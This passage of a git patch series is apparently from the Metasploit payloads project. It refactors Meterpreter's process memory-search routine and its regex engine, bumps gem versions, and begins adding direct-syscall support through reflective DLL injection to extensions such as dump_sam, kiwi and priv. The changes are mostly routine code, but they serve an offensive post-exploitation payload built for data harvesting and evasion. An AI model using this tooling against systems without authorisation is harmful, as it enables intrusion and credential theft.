bytes_to_read); + memory_region_offset += bytes_to_read; + continue; + } dprintf("[MEM SEARCH] Read %llu bytes", bytes_read); // Note: Increment the offset so that we aren't stuck in an infinite loop, trying to read zero bytes from the same pointer. @@ -692,10 +599,10 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) do { - const char* current_buffer_ptr = buffer + current_buffer_offset; + const unsigned char* current_buffer_ptr = memory_buffer + current_buffer_offset; const size_t bytes_to_regex = bytes_read - current_buffer_offset; - result = re_matchp(regex_needles[current_needle_index]->compiled_needle, current_buffer_ptr, bytes_to_regex, &match_length); + result = re_matchp((re_t)®ex_needles[current_needle_index].compiled_regex, current_buffer_ptr, bytes_to_regex, &match_length); if (result != -1) { @@ -712,9 +619,11 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) // TODO: Add a workaround for match length to the regex itself, allowing the regex engine to stop matching once an upper limit has been reached. const size_t current_match_length = min(max_match_length, match_length); - const char* memory_buffer_ptr = buffer + current_buffer_offset + result; - const NTSTATUS add_needles_result = add_needle_results_to_packet(&response, memory_buffer_ptr, current_match_length, match_address, (size_t)mem.BaseAddress, mem.RegionSize); - if (add_needles_result != ERROR_SUCCESS) { dprintf("[MEM SEARCH] Adding search results to packet was not successful"); } + const unsigned char* memory_buffer_ptr = memory_buffer + current_buffer_offset + result; + if (add_needle_results_to_packet(response, memory_buffer_ptr, current_match_length, match_address, (size_t)mem.BaseAddress, mem.RegionSize) != ERROR_SUCCESS) + { + dprintf("[MEM SEARCH] Adding search results to packet was not successful"); + } current_buffer_offset += (result + current_match_length); } @@ -731,16 +640,9 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) done: dprintf("[MEM SEARCH] Memory Search complete."); - if (buffer != NULL) { dprintf("[MEM SEARCH] Freeing process memory buffer."); free(buffer); } + if (memory_buffer != NULL) { dprintf("[MEM SEARCH] Freeing process memory buffer."); free(memory_buffer); } if (process_handle != NULL) { dprintf("[MEM SEARCH] Closing process handle."); fCloseHandle(process_handle); } - dprintf("[MEM SEARCH] Cleaning up needles"); - for (size_t i = 0; i < needle_enum_index; i++) - { - const NTSTATUS cleanup_result = cleanup_needle(®ex_needles[i]); - if (cleanup_result == ERROR_INVALID_PARAMETER) { dprintf("[MEM SEARCH] Could not clean up needle"); } - } - dprintf("[MEM SEARCH] Transmitting response"); met_api->packet.transmit_response(result, remote, response); return ERROR_SUCCESS; diff --git a/c/meterpreter/source/tiny-regex-c/re.c b/c/meterpreter/source/tiny-regex-c/re.c index b5fd887c3..4c13e11a3 100644 --- a/c/meterpreter/source/tiny-regex-c/re.c +++ b/c/meterpreter/source/tiny-regex-c/re.c @@ -62,7 +62,7 @@ int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchl return ((matchpattern(&pattern[1], text, text_length, 0, matchlength)) ? 0 : -1); } - size_t idx = -1; + int idx = -1; do { @@ -70,18 +70,16 @@ int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchl if (matchpattern(pattern, text, text_length, idx, matchlength)) { - return (int)idx; + return idx; } } - while (idx < text_length); + while ((size_t)idx < text_length); return -1; } -int re_compile(const char* pattern, size_t pattern_length, size_t max_regex_objects, size_t max_char_class_len, re_t* out_compiled, unsigned char** out_ccl) +int re_compile(const char* pattern, size_t pattern_length, re_t compiled_regex, unsigned char* regex_char_buffer) { - if (out_compiled == NULL || out_ccl == NULL) { return 1; } - int ccl_bufidx = 1; char c; /* current char in pattern */ @@ -95,13 +93,13 @@ int re_compile(const char* pattern, size_t pattern_length, size_t max_regex_obje switch (c) { /* Meta-characters: */ - case '^': { (*out_compiled)[j].type = BEGIN; } break; - case '$': { (*out_compiled)[j].type = END; } break; - case '.': { (*out_compiled)[j].type = DOT; } break; - case '*': { (*out_compiled)[j].type = STAR; } break; - case '+': { (*out_compiled)[j].type = PLUS; } break; - case '?': { (*out_compiled)[j].type = QUESTIONMARK; } break; - /* case '|': { re_compiled[j].type = BRANCH; } break; <-- not working properly */ + case '^': { compiled_regex[j].type = BEGIN; } break; + case '$': { compiled_regex[j].type = END; } break; + case '.': { compiled_regex[j].type = DOT; } break; + case '*': { compiled_regex[j].type = STAR; } break; + case '+': { compiled_regex[j].type = PLUS; } break; + case '?': { compiled_regex[j].type = QUESTIONMARK; } break; + /* case '|': { compiled_regex[j].type = BRANCH; } break; <-- not working properly */ /* Escaped character-classes (\s \w ...): */ case '\\': @@ -114,25 +112,25 @@ int re_compile(const char* pattern, size_t pattern_length, size_t max_regex_obje switch (pattern[i]) { /* Meta-character: */ - case 'd': { (*out_compiled)[j].type = DIGIT; } break; - case 'D': { (*out_compiled)[j].type = NOT_DIGIT; } break; - case 'w': { (*out_compiled)[j].type = ALPHA; } break; - case 'W': { (*out_compiled)[j].type = NOT_ALPHA; } break; - case 's': { (*out_compiled)[j].type = WHITESPACE; } break; - case 'S': { (*out_compiled)[j].type = NOT_WHITESPACE; } break; + case 'd': { compiled_regex[j].type = DIGIT; } break; + case 'D': { compiled_regex[j].type = NOT_DIGIT; } break; + case 'w': { compiled_regex[j].type = ALPHA; } break; + case 'W': { compiled_regex[j].type = NOT_ALPHA; } break; + case 's': { compiled_regex[j].type = WHITESPACE; } break; + case 'S': { compiled_regex[j].type = NOT_WHITESPACE; } break; /* Escaped character, e.g. '.' or '$' */ default: { - (*out_compiled)[j].type = CHAR_RE; - (*out_compiled)[j].u.ch = pattern[i]; + compiled_regex[j].type = CHAR_RE; + compiled_regex[j].u.ch = pattern[i]; } break; } } else { - (*out_compiled)[j].type = CHAR_RE; - (*out_compiled)[j].u.ch = pattern[i]; + compiled_regex[j].type = CHAR_RE; + compiled_regex[j].u.ch = pattern[i]; } } break; @@ -145,7 +143,7 @@ int re_compile(const char* pattern, size_t pattern_length, size_t max_regex_obje /* Look-ahead to determine if negated */ if (pattern[i + 1] == '^') { - (*out_compiled)[j].type = INV_CHAR_CLASS; + compiled_regex[j].type = INV_CHAR_CLASS; i += 1; /* Increment i to avoid including '^' in the char-buffer */ if (i + 1 == (int)pattern_length) /* incomplete pattern, missing non-zero char after '^' */ { @@ -154,7 +152,7 @@ int re_compile(const char* pattern, size_t pattern_length, size_t max_regex_obje } else { - (*out_compiled)[j].type = CHAR_CLASS; + compiled_regex[j].type = CHAR_CLASS; } /* Copy characters inside [..] to buffer */ @@ -172,14 +170,14 @@ int re_compile(const char* pattern, size_t pattern_length, size_t max_regex_obje { return 1; } - (*out_ccl)[ccl_bufidx++] = pattern[i++]; + regex_char_buffer[ccl_bufidx++] = pattern[i++]; } else if (ccl_bufidx >= MAX_CHAR_CLASS_LEN) { //fputs("exceeded internal buffer!\n", stderr); return 1; } - (*out_ccl)[ccl_bufidx++] = pattern[i]; + regex_char_buffer[ccl_bufidx++] = pattern[i]; } if (ccl_bufidx >= MAX_CHAR_CLASS_LEN) { @@ -188,15 +186,15 @@ int re_compile(const char* pattern, size_t pattern_length, size_t max_regex_obje return 1; } /* Null-terminate string end */ - (*out_ccl)[ccl_bufidx++] = 0; - (*out_compiled)[j].u.ccl = &(*out_ccl)[buf_begin]; + regex_char_buffer[ccl_bufidx++] = 0; + compiled_regex[j].u.ccl = ®ex_char_buffer[buf_begin]; } break; /* Other characters: */ default: { - (*out_compiled)[j].type = CHAR_RE; - (*out_compiled)[j].u.ch = c; + compiled_regex[j].type = CHAR_RE; + compiled_regex[j].u.ch = c; } break; } @@ -204,7 +202,7 @@ int re_compile(const char* pattern, size_t pattern_length, size_t max_regex_obje j += 1; } /* 'UNUSED' is a sentinel used to indicate end-of-pattern */ - (*out_compiled)[j].type = UNUSED; + compiled_regex[j].type = UNUSED; return 0; // ERROR_SUCCESS } @@ -364,7 +362,7 @@ static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_ const char* prepoint = text; while ((text_offset < text_length) && matchone(p, text[text_offset])) { - text_offset++; + text_offset++; (*matchlength)++; } while (&text[text_offset] >= prepoint) @@ -383,7 +381,7 @@ static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_ const char* prepoint = text; while ((text_offset < text_length) && matchone(p, text[text_offset])) { - text_offset++; + text_offset++; (*matchlength)++; } while (text > prepoint) diff --git a/c/meterpreter/source/tiny-regex-c/re.h b/c/meterpreter/source/tiny-regex-c/re.h index 45b8cdf11..28956d263 100644 --- a/c/meterpreter/source/tiny-regex-c/re.h +++ b/c/meterpreter/source/tiny-regex-c/re.h @@ -62,7 +62,7 @@ typedef struct regex_t* re_t; int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchlength); /* Compile a regular expression in-place, allowing for multiple needles to be compiled without the usage of a static buffer. Returns ERROR_SUCCESS (0) on success, else 1. */ -int re_compile(const char* pattern, size_t pattern_length, size_t max_regex_objects, size_t max_char_class_len, re_t* out_compiled, unsigned char** out_ccl); +int re_compile(const char* pattern, size_t pattern_length, re_t compiled_regex, unsigned char* regex_char_buffer); #ifdef __cplusplus } From 92d04de09cc9ad68c94cc7c329dfcd7f1b1158b7 Mon Sep 17 00:00:00 2001 From: sjanusz-r7 Date: Mon, 11 Dec 2023 13:30:44 +0000 Subject: [PATCH 04/14] Add maximum match length limit to regex matcher --- .../stdapi/server/sys/process/memory.c | 10 ++--- c/meterpreter/source/tiny-regex-c/re.c | 43 ++++++++++--------- c/meterpreter/source/tiny-regex-c/re.h | 2 +- 3 files changed, 27 insertions(+), 28 deletions(-) diff --git a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c index e592dd4ce..15cf165ad 100644 --- a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c +++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c @@ -601,8 +601,8 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) { const unsigned char* current_buffer_ptr = memory_buffer + current_buffer_offset; const size_t bytes_to_regex = bytes_read - current_buffer_offset; - - result = re_matchp((re_t)®ex_needles[current_needle_index].compiled_regex, current_buffer_ptr, bytes_to_regex, &match_length); + + result = re_matchp((re_t)®ex_needles[current_needle_index].compiled_regex, current_buffer_ptr, bytes_to_regex, current_max_match_length, &match_length); if (result != -1) { @@ -617,15 +617,13 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) continue; } - // TODO: Add a workaround for match length to the regex itself, allowing the regex engine to stop matching once an upper limit has been reached. - const size_t current_match_length = min(max_match_length, match_length); const unsigned char* memory_buffer_ptr = memory_buffer + current_buffer_offset + result; - if (add_needle_results_to_packet(response, memory_buffer_ptr, current_match_length, match_address, (size_t)mem.BaseAddress, mem.RegionSize) != ERROR_SUCCESS) + if (add_needle_results_to_packet(response, memory_buffer_ptr, match_length, match_address, (size_t)mem.BaseAddress, mem.RegionSize) != ERROR_SUCCESS) { dprintf("[MEM SEARCH] Adding search results to packet was not successful"); } - current_buffer_offset += (result + current_match_length); + current_buffer_offset += (result + match_length); } } while (result != -1); diff --git a/c/meterpreter/source/tiny-regex-c/re.c b/c/meterpreter/source/tiny-regex-c/re.c index 4c13e11a3..98eaf66cd 100644 --- a/c/meterpreter/source/tiny-regex-c/re.c +++ b/c/meterpreter/source/tiny-regex-c/re.c @@ -37,10 +37,10 @@ enum { UNUSED, DOT, BEGIN, END, QUESTIONMARK, STAR, PLUS, CHAR_RE, CHAR_CLASS, INV_CHAR_CLASS, DIGIT, NOT_DIGIT, ALPHA, NOT_ALPHA, WHITESPACE, NOT_WHITESPACE, /* BRANCH */ }; /* Private function declarations: */ -static int matchpattern(regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength); +static int matchpattern(regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_size, size_t* matchlength); static int matchcharclass(char c, const char* str); -static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength); -static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength); +static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_size, size_t* matchlength); +static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_size, size_t* matchlength); static int matchone(regex_t p, char c); static int matchdigit(char c); static int matchalpha(char c); @@ -51,15 +51,16 @@ static int matchdot(char c); static int ismetachar(char c); /* Public functions: */ -int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchlength) +int re_matchp(re_t pattern, const char* text, size_t text_length, size_t max_match_length, size_t* matchlength) { + if (max_match_length == 0) { return -1; } *matchlength = 0; if (pattern == 0 || text_length == 0) { return -1; } if (pattern[0].type == BEGIN) { - return ((matchpattern(&pattern[1], text, text_length, 0, matchlength)) ? 0 : -1); + return ((matchpattern(&pattern[1], text, text_length, 0, max_match_length, matchlength)) ? 0 : -1); } int idx = -1; @@ -68,7 +69,7 @@ int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchl { idx += 1; - if (matchpattern(pattern, text, text_length, idx, matchlength)) + if (matchpattern(pattern, text, text_length, idx, max_match_length, matchlength)) { return idx; } @@ -356,18 +357,18 @@ static int matchone(regex_t p, char c) } } -static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength) +static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_length, size_t* matchlength) { size_t prelen = *matchlength; const char* prepoint = text; - while ((text_offset < text_length) && matchone(p, text[text_offset])) + while ((text_offset < text_length) && (max_match_length > *matchlength) && matchone(p, text[text_offset])) { text_offset++; (*matchlength)++; } while (&text[text_offset] >= prepoint) { - if (matchpattern(pattern, text, text_length, text_offset--, matchlength)) + if (matchpattern(pattern, text, text_length, text_offset--, max_match_length, matchlength)) return 1; (*matchlength)--; } @@ -376,17 +377,17 @@ static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_ return 0; } -static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength) +static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_length, size_t* matchlength) { const char* prepoint = text; - while ((text_offset < text_length) && matchone(p, text[text_offset])) + while ((text_offset < text_length) && (max_match_length > *matchlength) && matchone(p, text[text_offset])) { text_offset++; (*matchlength)++; } while (text > prepoint) { - if (matchpattern(pattern, text, text_length, text_offset--, matchlength)) + if (matchpattern(pattern, text, text_length, text_offset--, max_match_length, matchlength)) return 1; (*matchlength)--; } @@ -394,15 +395,15 @@ static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_ return 0; } -static int matchquestion(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength) +static int matchquestion(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_length, size_t* matchlength) { if (p.type == UNUSED) return 1; - if (matchpattern(pattern, text, text_length, text_offset, matchlength)) + if (matchpattern(pattern, text, text_length, text_offset, max_match_length, matchlength)) return 1; - if ((text_offset < text_length) && matchone(p, text[text_offset++])) + if ((text_offset < text_length) && (max_match_length > *matchlength) && matchone(p, text[text_offset++])) { - if (matchpattern(pattern, text, text_length, text_offset, matchlength)) + if (matchpattern(pattern, text, text_length, text_offset, max_match_length, matchlength)) { (*matchlength)++; return 1; @@ -449,22 +450,22 @@ static int matchpattern(regex_t* pattern, const char* text, int *matchlength) #else /* Iterative matching */ -static int matchpattern(regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength) +static int matchpattern(regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_length, size_t* matchlength) { size_t pre = *matchlength; do { if ((pattern[0].type == UNUSED) || (pattern[1].type == QUESTIONMARK)) { - return matchquestion(pattern[0], &pattern[2], text, text_length, text_offset, matchlength); + return matchquestion(pattern[0], &pattern[2], text, text_length, text_offset, max_match_length, matchlength); } else if (pattern[1].type == STAR) { - return matchstar(pattern[0], &pattern[2], text, text_length, text_offset, matchlength); + return matchstar(pattern[0], &pattern[2], text, text_length, text_offset, max_match_length, matchlength); } else if (pattern[1].type == PLUS) { - return matchplus(pattern[0], &pattern[2], text, text_length, text_offset, matchlength); + return matchplus(pattern[0], &pattern[2], text, text_length, text_offset, max_match_length, matchlength); } else if ((pattern[0].type == END) && pattern[1].type == UNUSED) { @@ -478,7 +479,7 @@ static int matchpattern(regex_t* pattern, const char* text, size_t text_length, */ (*matchlength)++; } - while ((text_offset < text_length) && matchone(*pattern++, text[text_offset++])); + while ((text_offset < text_length) && (max_match_length > *matchlength) && matchone(*pattern++, text[text_offset++])); *matchlength = pre; return 0; diff --git a/c/meterpreter/source/tiny-regex-c/re.h b/c/meterpreter/source/tiny-regex-c/re.h index 28956d263..1419df34a 100644 --- a/c/meterpreter/source/tiny-regex-c/re.h +++ b/c/meterpreter/source/tiny-regex-c/re.h @@ -59,7 +59,7 @@ typedef struct regex_t* re_t; #define MAX_CHAR_CLASS_LEN 255 /* Max length of character-class buffer in. */ /* Find matches of the compiled pattern inside text. */ -int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchlength); +int re_matchp(re_t pattern, const char* text, size_t text_length, size_t max_match_length, size_t* matchlength); /* Compile a regular expression in-place, allowing for multiple needles to be compiled without the usage of a static buffer. Returns ERROR_SUCCESS (0) on success, else 1. */ int re_compile(const char* pattern, size_t pattern_length, re_t compiled_regex, unsigned char* regex_char_buffer); From 4f19a1c4aeffb443a29efb76c9675f9e6e855ed1 Mon Sep 17 00:00:00 2001 From: sjanusz-r7 Date: Thu, 4 Jan 2024 16:34:08 +0000 Subject: [PATCH 05/14] Fix Memory Search variable shadowing --- .../stdapi/server/sys/process/memory.c | 16 +++++++--------- 1 file changed, 7 insertions(+), 9 deletions(-) diff --git a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c index 15cf165ad..8fd759ec7 100644 --- a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c +++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c @@ -595,39 +595,37 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) { size_t current_buffer_offset = 0; size_t match_length = 0; - int result = -1; + int match_result = -1; do { const unsigned char* current_buffer_ptr = memory_buffer + current_buffer_offset; const size_t bytes_to_regex = bytes_read - current_buffer_offset; - result = re_matchp((re_t)®ex_needles[current_needle_index].compiled_regex, current_buffer_ptr, bytes_to_regex, current_max_match_length, &match_length); + match_result = re_matchp((re_t)®ex_needles[current_needle_index].compiled_regex, current_buffer_ptr, bytes_to_regex, current_max_match_length, &match_length); - if (result != -1) + if (match_result != -1) { - const size_t match_address = read_address + current_buffer_offset + result; + const size_t match_address = read_address + current_buffer_offset + match_result; dprintf("[MEM SEARCH] -- ! FOUND A REGEX MATCH ! --"); dprintf("[MEM SEARCH] Address: %p", match_address); if (match_length < min_match_length) { dprintf("[MEM SEARCH] Match length was too short, skipping."); - current_buffer_offset += (result + match_length); + current_buffer_offset += (match_result + match_length); continue; } - const unsigned char* memory_buffer_ptr = memory_buffer + current_buffer_offset + result; + const unsigned char* memory_buffer_ptr = memory_buffer + current_buffer_offset + match_result; if (add_needle_results_to_packet(response, memory_buffer_ptr, match_length, match_address, (size_t)mem.BaseAddress, mem.RegionSize) != ERROR_SUCCESS) { dprintf("[MEM SEARCH] Adding search results to packet was not successful"); } - current_buffer_offset += (result + match_length); + current_buffer_offset += (match_result + match_length); } - } while (result != -1); - } memory_region_offset += bytes_to_read; From d8fb9eaf95df6cd8798087130b3ff1faa51efcf9 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Thu, 4 Jan 2024 11:54:24 -0600 Subject: [PATCH 06/14] Bump metasploit-payloads to 2.0.164 --- gem/lib/metasploit-payloads/version.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/gem/lib/metasploit-payloads/version.rb b/gem/lib/metasploit-payloads/version.rb index ee31ed2ba..830cc80c6 100644 --- a/gem/lib/metasploit-payloads/version.rb +++ b/gem/lib/metasploit-payloads/version.rb @@ -1,6 +1,6 @@ # -*- coding:binary -*- module MetasploitPayloads - VERSION = '2.0.163' + VERSION = '2.0.164' def self.version VERSION From aeb6945bd26bcf6176123e1d442901927c77d86f Mon Sep 17 00:00:00 2001 From: sjanusz-r7 Date: Mon, 8 Jan 2024 10:10:16 +0000 Subject: [PATCH 07/14] Fix incorrect Memory Search variable name --- .../source/extensions/stdapi/server/sys/process/memory.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c index 8fd759ec7..ec404be30 100644 --- a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c +++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c @@ -625,7 +625,7 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) current_buffer_offset += (match_result + match_length); } - } while (result != -1); + } while (match_result != -1); } memory_region_offset += bytes_to_read; From 6143148e22337c7b2ff93aeb67e492022bb148f8 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Mon, 8 Jan 2024 04:52:57 -0600 Subject: [PATCH 08/14] Bump metasploit-payloads to 2.0.165 --- gem/lib/metasploit-payloads/version.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/gem/lib/metasploit-payloads/version.rb b/gem/lib/metasploit-payloads/version.rb index 830cc80c6..c3dc1d272 100644 --- a/gem/lib/metasploit-payloads/version.rb +++ b/gem/lib/metasploit-payloads/version.rb @@ -1,6 +1,6 @@ # -*- coding:binary -*- module MetasploitPayloads - VERSION = '2.0.164' + VERSION = '2.0.165' def self.version VERSION From 7082431daef56452c30e9b5bede19037bd28375a Mon Sep 17 00:00:00 2001 From: Christophe De La Fuente Date: Fri, 3 Nov 2023 16:55:30 +0100 Subject: [PATCH 09/14] Pull in changes from ReflectiveDLLInjection to support direct syscalls - Includes ColdGate.c in each project - Change railgun macro name to stdcall_func - Update VS configs - Update cmake files for mingw - Fix cmake files for kiwi builds - Update ReflectiveDLLInjection module to verify if CI passes - Update include file names & ReflectiveDLLInjection submodule --- .gitmodules | 3 +- c/meterpreter/source/ReflectiveDLLInjection | 2 +- c/meterpreter/source/dump_sam/dump_sam.c | 1 + c/meterpreter/source/elevator/elevator.c | 1 + .../source/extensions/bofloader/bofloader.c | 1 + c/meterpreter/source/extensions/espia/espia.c | 1 + .../source/extensions/extapi/extapi.c | 1 + .../source/extensions/incognito/incognito.c | 1 + c/meterpreter/source/extensions/kiwi/main.c | 1 + .../source/extensions/lanattacks/lanattacks.c | 1 + .../source/extensions/peinjector/peinjector.c | 1 + .../source/extensions/powershell/powershell.c | 1 + c/meterpreter/source/extensions/priv/priv.c | 1 + .../source/extensions/python/python_main.c | 1 + .../source/extensions/sniffer/sniffer.c | 1 + .../stdapi/server/railgun/railgun.c | 104 +++++++++--------- .../stdapi/server/railgun/railgun.h | 2 +- .../source/extensions/stdapi/server/stdapi.c | 1 + .../source/extensions/unhook/unhook.c | 1 + .../winpmem/winpmem_meterpreter.cpp | 1 + c/meterpreter/source/metsrv/metsrv.c | 1 + c/meterpreter/source/metsrv/metsrv.h | 4 + c/meterpreter/source/screenshot/screenshot.c | 1 + c/meterpreter/workspace/CMakeLists.txt | 3 + .../ReflectiveDLLInjection/CMakeLists.txt | 19 ++++ .../ReflectiveDLLInjection.vcxproj | 12 ++ .../workspace/dump_sam/CMakeLists.txt | 2 +- .../workspace/dump_sam/dump_sam.vcxproj | 27 ++++- .../workspace/elevator/CMakeLists.txt | 2 +- .../workspace/elevator/elevator.vcxproj | 31 ++++-- .../ext_server_bofloader/CMakeLists.txt | 2 +- .../ext_server_bofloader.vcxproj | 42 +++++-- .../workspace/ext_server_espia/CMakeLists.txt | 2 +- .../ext_server_espia/ext_server_espia.vcxproj | 20 +++- .../ext_server_extapi/CMakeLists.txt | 2 +- .../ext_server_extapi.vcxproj | 20 +++- .../ext_server_incognito/CMakeLists.txt | 2 +- .../ext_server_incognito.vcxproj | 20 +++- .../workspace/ext_server_kiwi/CMakeLists.txt | 6 +- .../ext_server_kiwi/ext_server_kiwi.vcxproj | 18 +++ .../ext_server_kiwi.vcxproj.filters | 4 + .../ext_server_lanattacks/CMakeLists.txt | 2 +- .../ext_server_lanattacks.vcxproj | 20 +++- .../ext_server_peinjector/CMakeLists.txt | 2 +- .../ext_server_peinjector.vcxproj | 20 +++- .../ext_server_powershell/CMakeLists.txt | 2 +- .../ext_server_powershell.vcxproj | 20 +++- .../workspace/ext_server_priv/CMakeLists.txt | 6 +- .../ext_server_priv/ext_server_priv.vcxproj | 20 +++- .../ext_server_python/CMakeLists.txt | 2 +- .../ext_server_python.vcxproj | 18 ++- .../ext_server_python.vcxproj.filters | 3 + .../ext_server_sniffer/CMakeLists.txt | 2 +- .../ext_server_sniffer.vcxproj | 16 ++- .../ext_server_stdapi/CMakeLists.txt | 2 +- .../ext_server_stdapi.vcxproj | 20 +++- .../ext_server_unhook/CMakeLists.txt | 2 +- .../ext_server_unhook.vcxproj | 20 +++- .../ext_server_winpmem/CMakeLists.txt | 2 +- .../ext_server_winpmem.vcxproj | 20 +++- c/meterpreter/workspace/meterpreter.sln | 4 +- c/meterpreter/workspace/metsrv/CMakeLists.txt | 2 +- c/meterpreter/workspace/metsrv/metsrv.vcxproj | 21 +++- .../workspace/metsrv/metsrv.vcxproj.filters | 4 + .../workspace/screenshot/CMakeLists.txt | 2 +- .../workspace/screenshot/screenshot.vcxproj | 20 +++- 66 files changed, 507 insertions(+), 112 deletions(-) mode change 100644 => 100755 c/meterpreter/source/dump_sam/dump_sam.c mode change 100644 => 100755 c/meterpreter/source/elevator/elevator.c mode change 100644 => 100755 c/meterpreter/source/extensions/bofloader/bofloader.c mode change 100644 => 100755 c/meterpreter/source/extensions/espia/espia.c mode change 100644 => 100755 c/meterpreter/source/extensions/extapi/extapi.c mode change 100644 => 100755 c/meterpreter/source/extensions/incognito/incognito.c mode change 100644 => 100755 c/meterpreter/source/extensions/lanattacks/lanattacks.c mode change 100644 => 100755 c/meterpreter/source/extensions/priv/priv.c mode change 100644 => 100755 c/meterpreter/source/extensions/sniffer/sniffer.c mode change 100644 => 100755 c/meterpreter/source/extensions/stdapi/server/railgun/railgun.h mode change 100644 => 100755 c/meterpreter/source/extensions/stdapi/server/stdapi.c mode change 100644 => 100755 c/meterpreter/source/extensions/unhook/unhook.c mode change 100644 => 100755 c/meterpreter/source/extensions/winpmem/winpmem_meterpreter.cpp mode change 100644 => 100755 c/meterpreter/source/metsrv/metsrv.c mode change 100644 => 100755 c/meterpreter/source/metsrv/metsrv.h mode change 100644 => 100755 c/meterpreter/source/screenshot/screenshot.c create mode 100644 c/meterpreter/workspace/ReflectiveDLLInjection/CMakeLists.txt diff --git a/.gitmodules b/.gitmodules index 68c4a63e0..c9e32c313 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,6 +1,7 @@ [submodule "source/ReflectiveDLLInjection"] path = c/meterpreter/source/ReflectiveDLLInjection - url = https://github.com/rapid7/ReflectiveDLLInjection.git + url = https://github.com/cdelafuente-r7/ReflectiveDLLInjection.git + branch = direct_syscalls2 [submodule "deps"] path = c/meterpreter/deps url = https://github.com/rapid7/meterpreter-deps diff --git a/c/meterpreter/source/ReflectiveDLLInjection b/c/meterpreter/source/ReflectiveDLLInjection index fac3adab1..77be38083 160000 --- a/c/meterpreter/source/ReflectiveDLLInjection +++ b/c/meterpreter/source/ReflectiveDLLInjection @@ -1 +1 @@ -Subproject commit fac3adab1187deade60eef27be8423ee117c1e1f +Subproject commit 77be380836a54218a76d1aadfd3846c1e62f0edd diff --git a/c/meterpreter/source/dump_sam/dump_sam.c b/c/meterpreter/source/dump_sam/dump_sam.c old mode 100644 new mode 100755 index 4e4f90041..4250198d3 --- a/c/meterpreter/source/dump_sam/dump_sam.c +++ b/c/meterpreter/source/dump_sam/dump_sam.c @@ -7,6 +7,7 @@ #define RDIDLL_NOEXPORT #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR +#include "../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "ReflectiveLoader.c" diff --git a/c/meterpreter/source/elevator/elevator.c b/c/meterpreter/source/elevator/elevator.c old mode 100644 new mode 100755 index cd360f73f..aeeade136 --- a/c/meterpreter/source/elevator/elevator.c +++ b/c/meterpreter/source/elevator/elevator.c @@ -17,6 +17,7 @@ #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN #define RDIDLL_NOEXPORT +#include "../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" /* diff --git a/c/meterpreter/source/extensions/bofloader/bofloader.c b/c/meterpreter/source/extensions/bofloader/bofloader.c old mode 100644 new mode 100755 index 8e8fe5d6e..869578620 --- a/c/meterpreter/source/extensions/bofloader/bofloader.c +++ b/c/meterpreter/source/extensions/bofloader/bofloader.c @@ -13,6 +13,7 @@ // Required so that use of the API works. MetApi* met_api = NULL; #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" /*! @brief The enabled commands for this extension. */ diff --git a/c/meterpreter/source/extensions/espia/espia.c b/c/meterpreter/source/extensions/espia/espia.c old mode 100644 new mode 100755 index 06787d0d6..7ada3666f --- a/c/meterpreter/source/extensions/espia/espia.c +++ b/c/meterpreter/source/extensions/espia/espia.c @@ -11,6 +11,7 @@ MetApi* met_api = NULL; #define 